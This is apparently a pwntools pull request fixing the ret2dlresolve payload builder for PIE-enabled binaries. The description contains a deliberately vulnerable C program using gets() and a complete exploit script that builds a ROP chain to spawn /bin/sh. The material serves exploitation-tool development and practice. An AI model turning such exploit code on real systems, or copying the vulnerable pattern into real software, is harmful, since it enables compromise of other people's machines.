### PR TITLE
fix a bug in ret2dlresolve when pie is enabled.

### DIFF
--- a/pwnlib/rop/ret2dlresolve.py
+++ b/pwnlib/rop/ret2dlresolve.py
@@ -303,7 +303,11 @@ class Ret2dlresolvePayload(object):
         rel_addr = self.jmprel + self.reloc_index * ElfRel.size
         rel_type = 7
         rel = ElfRel(r_offset=self.data_addr, r_info=(index<<ELF_R_SYM_SHIFT)+rel_type)
-
+        
+        # When a program's PIE is enabled, r_offset should be the relative address, not the absolute address
+        if self.elf.pie:
+            rel = ElfRel(r_offset=self.data_addr - (self.elf.load_addr + self.elf_load_address_fixup), r_info=(index<<ELF_R_SYM_SHIFT)+rel_type)
+        
         self.payload = fit({
             symbol_name_addr - self.data_addr: symbol_name,
             sym_addr - self.data_addr: sym,


### PR DESCRIPTION
I found the bug when I use the rop.dlresolve module  ，this is a demo program:
```
#include <stdio.h>

int main(){
    char buff[0x10];
    setbuf(stdin,NULL);
    setbuf(stdout,NULL);
    setbuf(stderr,NULL);
    //
    printf("address of main: %p\n",main);
    gets(buff);
    return 0;
}
``` 
compile it with command:
```
gcc ./main.c -fno-stack-protector -z lazy  -o ./pwn
```

when pie is disable , the rop.dlresolve module work as expected.

when pie is enable, I use the module again, but the demo program crashed:
![捕获](https://user-images.githubusercontent.com/83495929/201029662-0b029b03-f9bc-4ec1-887a-9d2eb6b95e52.JPG)

this is my exp:
```
from pwn import *
context.arch = 'amd64'

p = process('./pwn')
elf = ELF('./pwn')

#elf.address = 
p.recvuntil(b'address of main: ')
elf.address = int(p.recvline()[:-1],16) - elf.symbols['main']
rop = ROP(elf)

success('elf_base:' + hex(elf.address))


payload = Ret2dlresolvePayload(elf,'system',['/bin/sh'])

rop.gets(payload.data_addr)
rop.ret2dlresolve(payload)

pay = b'a' * 0x10 + p64(0)
pay += p64(rop.find_gadget(['ret']).address)
pay += rop.chain()

print(pay)
gdb.attach(p)
pause()
p.sendline(pay)
pause()
p.sendline(payload.payload)
p.interactive()
```

and I foud the value of rbx equals  0x55df98b41e00(ret2dlresolvePayload.data_addr) + 0x55df98b3d000(address of demo program)



After I read the source code of ret2dlresolve,I think there's something wrong here:
 
![捕获](https://user-images.githubusercontent.com/83495929/201031932-20eab3d6-df1e-49fe-92b9-cfd2259642fa.JPG)


When a program's PIE is enabled, r_offset should be the relative address, not the absolute address.
![捕获](https://user-images.githubusercontent.com/83495929/201032512-c0db3cf4-e5f8-48ac-b1e6-3b268a62c1d2.JPG)


After I modify the source code, the module work well.
![image](https://user-images.githubusercontent.com/83495929/201033426-23ce47af-3f63-4efb-a4d4-6ea0ffd1c714.png)

